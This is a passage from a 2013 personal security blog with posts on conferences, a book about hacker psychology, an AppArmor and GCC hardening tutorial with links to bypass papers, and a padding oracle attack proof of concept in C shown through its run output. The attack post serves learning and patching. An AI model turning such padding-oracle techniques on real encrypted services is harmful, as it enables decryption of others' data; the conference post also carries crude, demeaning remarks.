<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5oLEzKogfotfVG9FH2cNR_qVUt3g4d3EQclRGDg0UZfap_0RwJnPUvllPx0Ba3ouiaCmZb-mGOsHB6_lbcygh36NUH90u1MIBN2LKWysrQFbjdsTcfd22oVSUsnXDjWFfxNriRQ/s1600/3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5oLEzKogfotfVG9FH2cNR_qVUt3g4d3EQclRGDg0UZfap_0RwJnPUvllPx0Ba3ouiaCmZb-mGOsHB6_lbcygh36NUH90u1MIBN2LKWysrQFbjdsTcfd22oVSUsnXDjWFfxNriRQ/s640/3.JPG" width="640" /></a></div>
<br />Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com2tag:blogger.com,1999:blog-35345954.post-19565301872832945782013-09-28T10:20:00.000+08:002013-09-28T10:23:38.975+08:00Syscan Beijing 2013 slidesI've been to 5 conferences ( KCONv2, XCON2013, ISC2013, OWASP Beijing 2013, Syscan Beijing 2013) in past months. The 1st four confs were sucks. But the <a href="http://syscan360.org/html/2013/en/index.html" target="_blank">Syscan</a> brought us very high quality. Don't get me wrong. Some people think these 4 conferences are good. Because they are websec guys or windows guys. As a GNU/Linux sec guy, these conferences were drugging me to sleep;-) So, I only bullshit a little bit of Syscan here. Stefan Esser's presentation "Tales from iOS 6 Exploitation" shocked us;-) A lot of people thought Stefan many pieces technique elements in the process of exploiting and each one of them are difficult to deal with. But Stefan did them all at once. That's fuc*ing super awesome. NGUYEN Anh Quynh's presentation is about ROP gadgets. I don't know much about this field. I only used some open source ROP gadgets finder once or twice. Anyway, Nguyen's talk was also blowed up my mind in the 1st day of the conference. Because his apporach is combine a llvm compiler based( dude, you are using formal logic to deal with a sec shit! Fuc*ing awesome). Plz take a look at his slide. There were other great presentations. I'll leave the download slide in the end.<br />
<br />
Another funny story is in the almost end of Jonathan's presentation. A guy who asked him about FE. He just told us FE is nothing but a good advertising company. The real heroes are grsecurity guys: They invented the concept of ASLR, and more....btw, take a look at how grsec deal with stack canary in the hardend kernel;-)<br />
<br />
I've packed all slides into one<a href="http://hfg-resources.googlecode.com/files/syscan-bj-2013.tar.bz2" target="_blank"> tar.bz file</a>.<br />
<br />
Can you fucking imagine that the conference organizers( I wouldn't name you motherfuckers)
brought these girls( sexy? I don't think so) there? I don't care about
girls in a conference. As our type of guys, we'd go out to the club/bar after conference.
Unfortunately, I've already get married, which means "fuck around" part
is not belong to me;-) <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7ufje0JyKSdxnoQ2k6ZnDr8TMUgG4caAc3HYoCzYYcK_ZfYljZkOFGhJ97cjK60bsWk1DDwS7UrZ4wCEj_qSUkaEA4Hj7Ikom8N2latcV6YBExpxAAKj2ejzqAN2H2uW9QUOmvA/s1600/20130923_115706.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7ufje0JyKSdxnoQ2k6ZnDr8TMUgG4caAc3HYoCzYYcK_ZfYljZkOFGhJ97cjK60bsWk1DDwS7UrZ4wCEj_qSUkaEA4Hj7Ikom8N2latcV6YBExpxAAKj2ejzqAN2H2uW9QUOmvA/s640/20130923_115706.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0BUnAS5TG9wfEvC-P5kodJ8MYTU-KOvgv095YglkBTo5Yd0ajIc6p6y_7hd9Bhg8GY26pc4pWncczA__xGNpD3qoWCRf7WIT7stJjdDeXpsQwNkJpAok6Uda6tDbQ7qsozevD0Q/s1600/20130923_143802.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0BUnAS5TG9wfEvC-P5kodJ8MYTU-KOvgv095YglkBTo5Yd0ajIc6p6y_7hd9Bhg8GY26pc4pWncczA__xGNpD3qoWCRf7WIT7stJjdDeXpsQwNkJpAok6Uda6tDbQ7qsozevD0Q/s640/20130923_143802.jpg" width="640" /></a></div>
<br />Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-75213814064865362282013-07-28T02:11:00.000+08:002013-07-28T02:11:20.470+08:00Trip of Thessaloniki for osc 2013As many people mentioned, <a href="https://conference.opensuse.org/osem/conference/osc2013/schedule" target="_blank">openSUSE conference 2013</a> was held on July 18 to July 22 in <a href="http://en.wikipedia.org/wiki/Thessaloniki" target="_blank">Thessaloniki</a>, Greece. After 20hrs in the air and waiting in the airport( for transfer), I arrived in the city of Thessaloniki about 3:00 PM on July 17. Then I went to the sea side by buy No.78. It was really nice view there. Then I took a taxi to hotel for another 12 hrs sleep;-) I visited to the white tower and Aristotle square. The great Philosopher Aristotle was born in the place where near by the city of Thessaloniki. I thought Aristotle was visit the city but I haven't find the related information yet.<br />
<br />
It was really nice to be there. Local people are so relaxing. Much relaxer than I feel in Beijing. I love this place, I do. I met many interesting guys here, including security guys and non-security guys. Some people I met in Thessaloniki, we all love beer/sec/gaming/system of a down/ramstein/Nirvana/etc....even the background music of main conference room was Nirvana songs. Man, can you believe it? I never see it happened in China. They guys are really awesome. I also met some sec guys there. They are very skilled and talented dudes. I think I learned not less from them in few days.<br />
<br />
This trip makes me feel my way back home. Most people doesn't like what I like in BJ. I think the whole fucking society just can't accept the type of person like me. I don't wanna change.<br />
<br />
------------------------------------------------------------------------- <br />
- I love punk rock and metal, am I wrong?<br />
- I love Philosophy/Theology/History, am I fucking wrong?<br />
- I love Tri-A title computer/video games, am I fucking wrong?<br />
- I don't care how much money I earn( I can still feed my family, you piece of shit-_-), am I wrong? <br />
- I hate the type of guys in suit who are just dead inside( walk) with their fucking boring day job, am I fucking wrong?<br />
------------------------------------------------------------------------<br />
<br />
I don't think I'm a weirdo guy. But most Chinese people I met in BJ just think that way. Don't give me wrong...I have some very awesome friends. They are Chinese dudes/ladies. But we are minorities....Greenday is always supporting us: "I wanna be the minority... I don't need your authorirty...Down with moral majority"...aha, I really love this song;-)<br />
<br />
btw: The food in the city of Thessaloniki are really awesome, especially the seafood. And, I as a newbie had a presentation "<a href="https://github.com/citypw/citypw-SCFE/raw/master/security/slides/osc2013_hardening.pdf" target="_blank">Introduction to GNU/Linux hardening</a>" in osc 2013.<br />
<br />
Nice view, ha?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKmRuzg8w35lJb2um_rxhMgkwUN3rBNRy8MM_I3PjVwMCKZg4bFBjsuddPtZJuzGawSZbdY6AZFvHgH-l57kdaK4HY12dShFdOmhBfKab3CSSWIgqH_aCOHadUUNHjEn8xx9Ptsw/s1600/20130717_211517.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKmRuzg8w35lJb2um_rxhMgkwUN3rBNRy8MM_I3PjVwMCKZg4bFBjsuddPtZJuzGawSZbdY6AZFvHgH-l57kdaK4HY12dShFdOmhBfKab3CSSWIgqH_aCOHadUUNHjEn8xx9Ptsw/s640/20130717_211517.jpg" width="640" /></a></div>
<br />
old good port <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKds3eYJ04cjQXb73BdcO4Yk_2fnqpicNski2OHLvonT5JRUU1Ugyt0ywQWCC3-MJJy8IX4I06phLdTKZO3mCvBIh0n7UIZp9CpoKsACwrMFmGzafsxuGPDapZsApZIEuK5ShJ-w/s1600/20130717_211524.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKds3eYJ04cjQXb73BdcO4Yk_2fnqpicNski2OHLvonT5JRUU1Ugyt0ywQWCC3-MJJy8IX4I06phLdTKZO3mCvBIh0n7UIZp9CpoKsACwrMFmGzafsxuGPDapZsApZIEuK5ShJ-w/s640/20130717_211524.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBP4D6eGEsKDkt8goKZAC6vpk0AcCnrOjACr0KDwEjtL1GovKWOOIGIUx7-CaT3_mPQwpnRYGo-RpEruv90lIz3y_9PtdGAszYTQi-ehDepN0fh0o880jjtAfvworRST-rY82ULQ/s1600/20130718_143505.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBP4D6eGEsKDkt8goKZAC6vpk0AcCnrOjACr0KDwEjtL1GovKWOOIGIUx7-CaT3_mPQwpnRYGo-RpEruv90lIz3y_9PtdGAszYTQi-ehDepN0fh0o880jjtAfvworRST-rY82ULQ/s640/20130718_143505.jpg" width="640" /></a></div>
<br />
White Tower, or maybe we should call it "The Greece Tower" <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAItEUcG3WKyuPfnAw9kl0ooEJFJOpxAx76FpdyEkA2Tcb2LiZwcHqJaD1MH4QJ1tPd5kXlNX_i0cOtTU1iCJMS73CYs2p_qv504shQeXzw7lcmquGbMYvJwW-c41iiinimOE5NQ/s1600/20130718_152530.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAItEUcG3WKyuPfnAw9kl0ooEJFJOpxAx76FpdyEkA2Tcb2LiZwcHqJaD1MH4QJ1tPd5kXlNX_i0cOtTU1iCJMS73CYs2p_qv504shQeXzw7lcmquGbMYvJwW-c41iiinimOE5NQ/s640/20130718_152530.jpg" width="480" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDqBYh0vhSr80SE0VQxzGNffseLiG_cmp08NZbK4I9BvZ0Va3gcT9U3s2uKPNijlzRKdpyuoBLXg_RHCGUF8HdWiIMu9EJCjg19Nbx_b1-zCgQ5NknPtCn1oXzXz4OKVZg88RjZw/s1600/20130718_154558.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDqBYh0vhSr80SE0VQxzGNffseLiG_cmp08NZbK4I9BvZ0Va3gcT9U3s2uKPNijlzRKdpyuoBLXg_RHCGUF8HdWiIMu9EJCjg19Nbx_b1-zCgQ5NknPtCn1oXzXz4OKVZg88RjZw/s640/20130718_154558.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8HpLHisVilnhps36f-ZovmHGdJ6C3a9sM-GCi9iN5BqJCx_sscXrz4MoSVeFeYFhUazMJR5hnHbW7-FvYCIGPWfSuSTNUBU84ggGxucuuWFbXOC7G7ZUpgY4k1qqN3mP9U58IpA/s1600/20130718_154619.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8HpLHisVilnhps36f-ZovmHGdJ6C3a9sM-GCi9iN5BqJCx_sscXrz4MoSVeFeYFhUazMJR5hnHbW7-FvYCIGPWfSuSTNUBU84ggGxucuuWFbXOC7G7ZUpgY4k1qqN3mP9U58IpA/s640/20130718_154619.jpg" width="640" /></a></div>
<br />
I hadn't find the ASSOS yet;-) <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSxOUraglT7cGb7tPjz8KrdcaFxqPAheLIXRXHuK12Wr2yZwzm0LI3HEyIpbmmgFXbuJAGBQl1-DOQosz7FvZn5rM-7ijcJdQpVhAzokunZ_vpLCWj9wtnRQla8V1L8L6UtfaHEA/s1600/20130718_175419.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSxOUraglT7cGb7tPjz8KrdcaFxqPAheLIXRXHuK12Wr2yZwzm0LI3HEyIpbmmgFXbuJAGBQl1-DOQosz7FvZn5rM-7ijcJdQpVhAzokunZ_vpLCWj9wtnRQla8V1L8L6UtfaHEA/s640/20130718_175419.jpg" width="640" /></a></div>
Little dude, you got a gun?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF0tLSEp2yXpa9lOG_8z3NePE29socrxV5gaZfIH3dg_23OAnPAowKcxTa-iFnEv37WNfOzsQM5zX0ATpydduU8DiUwKAU4HEcoNALU7tL2XWotmoProVrZkgIeHClb_973hvc3g/s1600/20130718_234234.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF0tLSEp2yXpa9lOG_8z3NePE29socrxV5gaZfIH3dg_23OAnPAowKcxTa-iFnEv37WNfOzsQM5zX0ATpydduU8DiUwKAU4HEcoNALU7tL2XWotmoProVrZkgIeHClb_973hvc3g/s640/20130718_234234.jpg" width="640" /></a></div>
Olympic Museum, this is the place for osc2013<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvbHzwp3AaMojAIDo33xohp_H0RzGW2wc3Z66xaHBhCkVnic2jlu_ulWhZJ6z3JFhI4S8rJC8W5J78GAZiABw2mpDOiMte7EfwwkAAVOk8-MfSmvlnFlvRwVV5P4OHImjj43V2vQ/s1600/20130719_011119.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvbHzwp3AaMojAIDo33xohp_H0RzGW2wc3Z66xaHBhCkVnic2jlu_ulWhZJ6z3JFhI4S8rJC8W5J78GAZiABw2mpDOiMte7EfwwkAAVOk8-MfSmvlnFlvRwVV5P4OHImjj43V2vQ/s640/20130719_011119.jpg" width="640" /></a></div>
Gecko money is not a bad idea, isn't it?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP3vwHMkbqLgYIJb9TJGE7lXQJKmsYPBZOL_SjKrlNFjlgf0WUY0wYLu1mTfGDK0Zc3KOcXhU5evjA-4IiTvQcFc3OTY0ZDwP-liYaslDRfZlQ3Y7URGLXAtvFKgZ_nb6V6NmKhg/s1600/20130719_172224.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP3vwHMkbqLgYIJb9TJGE7lXQJKmsYPBZOL_SjKrlNFjlgf0WUY0wYLu1mTfGDK0Zc3KOcXhU5evjA-4IiTvQcFc3OTY0ZDwP-liYaslDRfZlQ3Y7URGLXAtvFKgZ_nb6V6NmKhg/s640/20130719_172224.jpg" width="640" /></a></div>
Sometime, RMS is wrong. Free speech is as free beer;-) <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTkQUbmSbgT-QHia2Wm3KSVpYht7MgAC9olw9D_byt4qvMTrdugBudjbQ6hGg__ZmR-fS1bY5aqFmkB-Qnp5p6BOjlkew-hznd1M-oqqKH8AjiCaPxTqWf1BcOCwVZG-5_c7aYmQ/s1600/20130722_182900.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTkQUbmSbgT-QHia2Wm3KSVpYht7MgAC9olw9D_byt4qvMTrdugBudjbQ6hGg__ZmR-fS1bY5aqFmkB-Qnp5p6BOjlkew-hznd1M-oqqKH8AjiCaPxTqWf1BcOCwVZG-5_c7aYmQ/s640/20130722_182900.jpg" width="640" /></a></div>
July 23, people are gone<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFbxzYu9FgUkSHexzf6DDGP74lUU_atI37jRvAf2p6r1dU7l6sHLcKF-SM-V5HHWshEVdcjIA7awje2DArKwtCH0KYUURNjV5SC4k1ptvFIh9Rluur97c_y_YNWJuZ5iKuKEwj1A/s1600/20130723_204040.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFbxzYu9FgUkSHexzf6DDGP74lUU_atI37jRvAf2p6r1dU7l6sHLcKF-SM-V5HHWshEVdcjIA7awje2DArKwtCH0KYUURNjV5SC4k1ptvFIh9Rluur97c_y_YNWJuZ5iKuKEwj1A/s640/20130723_204040.jpg" width="640" /></a></div>
I love this shit!@#$%^&*()<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhCwy7BFQKot1S-pG1kv-RffNKEELt1jgyS5u6CW12gV8mFWGDCdUu26VaQJWavVPHrT-49idsJLjFqY8LaWKJZsiIkM2fnlszSy5zZJ4BUejYe9ePsvIUCc7ibO10W37_0pmf7Q/s1600/20130724_005307.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhCwy7BFQKot1S-pG1kv-RffNKEELt1jgyS5u6CW12gV8mFWGDCdUu26VaQJWavVPHrT-49idsJLjFqY8LaWKJZsiIkM2fnlszSy5zZJ4BUejYe9ePsvIUCc7ibO10W37_0pmf7Q/s640/20130724_005307.jpg" width="640" /></a></div>
Istanbul - In the map of Civilization IV, ring the bell?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDlGgDqtnNHFjMo_EheUMOwIf34OTjP0w6yRGVci7WppwgMnaJWfLPceMkJOPuNE2J1tjEsOBCiruORFRlc9m9RWGsWyXcJk5Yz2TEcxIyfJmr89gaaykWs9QQCgnyFbO9_6A2mw/s1600/20130724_214306.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDlGgDqtnNHFjMo_EheUMOwIf34OTjP0w6yRGVci7WppwgMnaJWfLPceMkJOPuNE2J1tjEsOBCiruORFRlc9m9RWGsWyXcJk5Yz2TEcxIyfJmr89gaaykWs9QQCgnyFbO9_6A2mw/s640/20130724_214306.jpg" width="640" /></a></div>
Awesome architecture...........<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZeikOaXW6smLduZhFqPjwV0or9gw3FysCkfPOpi0mXWwDdJzkH50rk5pqHzuLe6zVRnun_UBzHCr-4U-3XS2dWXfeLkwT-17PSxqWUMco3rSSdGV1zgNKqV6xx69bebgYhotQEg/s1600/20130718_190351.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZeikOaXW6smLduZhFqPjwV0or9gw3FysCkfPOpi0mXWwDdJzkH50rk5pqHzuLe6zVRnun_UBzHCr-4U-3XS2dWXfeLkwT-17PSxqWUMco3rSSdGV1zgNKqV6xx69bebgYhotQEg/s640/20130718_190351.jpg" width="640" /></a></div>
<br />Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-40785623410337537392013-07-03T18:54:00.000+08:002013-07-03T18:54:01.093+08:00review the book "Profiling Hackers"<pre wrap="">I've been reading the book of <a href="http://www.amazon.com/Profiling-Hackers-Science-Criminal-Applied/dp/1420086936" target="_blank">Profiling Hackers</a> recently. For now, I only looked through a little bit. There are some topics are very interesting, so I'd like to share with you guys.</pre>
<pre wrap=""> </pre>
<pre wrap="">This book listed some questions below:</pre>
<pre wrap="">
</pre>
<pre wrap="">---------------------------------------------------
Why am I interested in hacking?
What are my objectives?
What am I trying to obtain through hacking?
What do I want to become?
What do I want people to think of me?
How do I want to be remembered, and what for?
---------------------------------------------------
It's the matter of the motivation of hacking. IMHO, hackers are always hacking for fun and yes, indeed( we can't deny it, right-_-) ..the profit. AlpheOne's paper's title was sort of philosophical metaphors;-) Both of motivations( fun/profit) are very important. Because if a security guy only care about one of them, it would be devastating for a person( hacker)'s life. </pre>
<pre wrap=""> </pre>
<pre wrap="">* Fun? To some hackers, hacking is part of their life. They can't live with hacking. They are happy with joy while writing exploit...</pre>
<pre wrap=""> </pre>
<pre wrap="">* Profit? Money, of course. White hat working for commercial company. Black hat?</pre>
<pre wrap=""> </pre>
<pre wrap="">* Both White and Black are possible to sale exploit or get involve with underground business</pre>
<pre wrap=""> </pre>
<pre wrap=""> </pre>
<pre wrap="">But....as a hacker, if we: </pre>
<pre wrap="">Only having the "fun" part. too spiritual dude... and it's hard to make the people( industry) believe you in real-life sec engineering.... Well, if the security is not your day job, that's another story;-)
Only having the "profit" part:
even worse, just like a lot of security conference runners( whores-_-) who only having one slide/topic and guffing around the world. They are a bunch of dead walks
As a real hacker, I do believe that he/she would have both of them.
And, the book also talking about the common trait of hackers, no matters of age, profession, ethnic, etc:</pre>
<pre wrap=""> </pre>
<pre wrap="">------------------------------------------------------------------------
* They usually have an above average IQ and great technical and problem-solving skills.
* They are brilliant adolescents, suffocated by an inadequate school system and by ill-prepared or poorly equipped teachers.
* They generally come from problem families.
* They rebel against all symbols or expressions of authority.
------------------------------------------------------------------------
It's true. Except the 3rd one is a little bit of vague. How to define the "problem families"? Divorce? or others? If it is mean that a family is lack of proper( btw: wth is *proper*) educate/homeschool for the kid, well...it'd be mean a huge number of families.
I'm not finish the reading. It's really great book. I never found a book which giving a way in sociology to discussion about hackers. The Hacker ethic and the spirit of Information age did some aspect of the work, but Pekka was more focus on the generic hacker( not only in computer/sec field).
</pre>
Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com2tag:blogger.com,1999:blog-35345954.post-16345046483054433032013-05-22T17:45:00.002+08:002013-05-28T12:10:05.170+08:00How to Hardening your own program in GNU/LinuxPlatform: OpenSUSE 12.3<br />
<br />
Apparmor is a implementation of confinement technology. It could help you prevent those unknown attacks like 0-day vulnerability. In OpenSUSE/Ubuntu, it's very easy to install it. For the case in openSUSE 12.3, type "yast2" in terminal or use GUI software management can install the apparmor. Once you install the apparmor, you need to make the profile for the program what you want to be hardened.<br />
<br />
Firstly, please download the <a href="https://github.com/citypw/citypw-SCFE/tree/master/security/apparmor_test" target="_blank">example files here</a>. Then compile the program:<br />
<br />
shawn@linux-sk8j:~> gcc apparmor_test.c<br />
<br />
Generate the profile for your program: <br />
shawn@linux-sk8j:~> sudo /usr/sbin/genprof a.out <br />
<br />
We trust you have received the usual lecture from the local System<br />
Administrator. It usually boils down to these three things:<br />
<br />
#1) Respect the privacy of others.<br />
#2) Think before you type.<br />
#3) With great power comes great responsibility.<br />
<br />
.........................................<br />
.........................................<br />
.........................................<br />
<br />
Finished generating profile for /home/shawn/a.out.<br />
-----------------------------------------------------------<br />
<br />
Then you can find the profile in /etc/apparmor.d/home.shawn.a.out. Add a few of lines into it like this:<br />
<br />
#include <tunables global=""></tunables><br />
<br />
/home/shawn/a.out {<br />
#include <abstractions base=""></abstractions><br />
<br />
/home/shawn/a.out mr,<br />
/home/shawn/hello r,<br />
/home/shawn/world w,<br />
network stream,<br />
} <br />
<br />
Because apparmor is using whitelist-like policy in default. The above example means: only allows this program( a.out) have the read permission on file /home/shawn/hello, the write permission on file /home/shawn/world and the tcp connection. If this program have a stack-based buffer overflow issue, the attacker might want to spawn the shell by exploit it. In this case, this not gonna be happened. For further reading about apparmor profile, you might be interested in <a href="http://www.insanitybit.com/tag/apparmor/" target="_blank">this article</a>. Other similar implementation like SELinux and Grsecurity/PaX could achieve the same goal. SELinux is the most powerful one but the most difficult to use.<br />
<br />
When you done the confinment hardening, there are a lot of mitigation technology you should consider. It's much easier to use. Please keep this in mind: these defensive technology are what we called "mitigation", which means the skilled hackers or attackers having the ability to exploit it. It's only the matter of time.<br />
<br />
GCC options:<br />
------------------------------------------------ <br />
Stack canary:<br />
-fstack-protector, only some functions being protected<br />
-fstack-protector-all, protect every functions in your program<br />
<br />
Bypass method, please check <a href="http://www.phrack.org/issues.html?issue=67&id=13&mode=txt" target="_blank">Scraps of notes on remote stack overflow exploitation</a> in Phrack Issue 67.<br />
<br />
Heap( malloc() corruption check):<br />
default since glibc 2.5. Please use the latest version of glibc.<br />
<br />
Position-Independent-Executable:<br />
-pie, it would use the advantage of ASLR which provided by kernel. Remember turn on your ASLR:<br />
<br />
<br />
Bypass method, please check <a href="http://phrack.org/issues.html?issue=59&id=9&mode=txt" target="_blank">Bypassing PaX ASLR protection</a> in Phrack Issue 59. Yes, it's an old paper but it's still worth to read.<br />
<br />
GOT memory corruption attack hardening of ELF binaries:<br />
-z relro, Partial RELRO<br />
-z relro -z now, Full RELRO<br />
<br />
Bypass method, please check <a href="http://fluxius.handgrep.se/2011/10/20/the-art-of-elf-analysises-and-exploitations/" target="_blank">The Art Of ELF: Analysis and Exploitations</a><br />
<br />
String Vulnerability mitigation:<br />
-FORTIFY_SOURCE, mitigate string format vuln<br />
<br />
Bypass method, please check <a href="http://www.phrack.org/issues.html?issue=67&id=9&mode=txt" target="_blank">A Eulogy for Format Strings</a> in Phrack Issue 67.<br />
<br />
Non-executable stack:<br />
-z nostack<br />
<br />
Well, there are a lot of ways to bypass it.<br />
<br />
I also made a list a few months ago. You may want to <a href="https://github.com/citypw/security-regression-testing-for-suse/blob/master/other/vulns_hardening_assessment.log" target="_blank">check it</a> too. Yes, there are a lot of mitigation tech and a lot of bypass tech. Offensive and defensive technologies are like brothers. The only matter is they will fight each other to the end of the world;-)<br />
<br />
btw: You don't need to worry about the performance hit when you turn on these mitigation tech except -fstack-protector-all. That's it!<br />
<br />
May L0rd's hacking spirit guide us!!!Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com35tag:blogger.com,1999:blog-35345954.post-2908988080599806632013-04-26T20:20:00.002+08:002013-04-27T09:46:35.617+08:00Padding Oracle Attack PoC in C<pre>I'm a newbie on crypto field. *Unfortunately*, I need to deal with some
open source security stuff( openssl and gnutls) in my day job. Yes,
don't be so sad for me;-) I can handle it so far. I need to know more
knowledge about crypto. The best way to do it is writing xxx-attack
PoC. Then I've heard of Lucky-13 is something. Backport these patches
from upstream drives me crazy. Dude, you known~ 13 openssl upstream
commits( more than 1,700 loc modifies) were only for fix one security
issue what called Lucky-13 Thirteen which was disclosured in Feb 2013. It
was my honor to do this shitload work with very very low salary;-)
After I finished it, a very serious question came out of my mind: What
if another tens of shitload work pop up in the future but with no help
from the upstream community? Well...I have to eat the rocket by my own
hands. F0r preparing to handle such situation, I need to know the
detail of the attack. That's why I wrote the padding oracle attack
PoC( <a href="https://github.com/citypw/arsenal-4-sec-testing/tree/master/libcrypto/lucky-what" target="_blank">Download here</a>).
I googled "padding oracle attack". I found 3 guys wrote their own
padding oracle attack PoC/tools in 3 differnt languages: perl, ruby
and python. I looked their code and articles. They guys are awesome!
Brian Holyfield( Perl guy) wrote this very good article and more
importantly it's easy to understand:
<a href="http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html">http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html</a>
Daoge( python one) is a CHiense hacker who are good at web
security:
<a href="http://hi.baidu.com/aullik5/item/49ab45de982a67db251f40f6">http://hi.baidu.com/aullik5/item/49ab45de982a67db251f40f6</a>
Ron Bowes( Ruby guy) gave us a great presentation at Shmoocon 2013. I
really thank his practical advice. He wrote two articles about padding
oracle attack. The 1st one introduce the principle and the 2nd is
giving an great example.
<a href="http://www.skullsecurity.org/blog/2013/padding-oracle-attacks-in-depth">http://www.skullsecurity.org/blog/2013/padding-oracle-attacks-in-depth</a>
<a href="http://www.skullsecurity.org/blog/2013/a-padding-oracle-example">http://www.skullsecurity.org/blog/2013/a-padding-oracle-example</a>
Well, I'm a kind of old school guy. I decided write it in
C( not old enough as asm). This example is simple:
shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ make
gcc -g -o padding_oracle_attack_poc padding_oracle_attack_poc.c -lcrypto
done
shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ ./padding_oracle_attack_poc
Ciphertext is 16 bytes: 83e10d51e6d122ca3faf089c7a924a7b
Decrypting now
205 is done: 00000000000000ce3faf089c7a924a7b
36 is done: 00000000000025cd3faf089c7a924a7b
214 is done: 0000000000d724cc3faf089c7a924a7b
230 is done: 00000000e7d023cb3faf089c7a924a7b
80 is done: 00000051e6d122ca3faf089c7a924a7b
110 is done: 00006f52e5d221c93faf089c7a924a7b
137 is done: 008a6e53e4d320c83faf089c7a924a7b
248 is done: f985615cebdc2fc73faf089c7a924a7b
The original plaintext is: "Hello World"
The one last block of plaintext: 726c6405050505050000000000000000
----> rld</pre>
<pre> </pre>
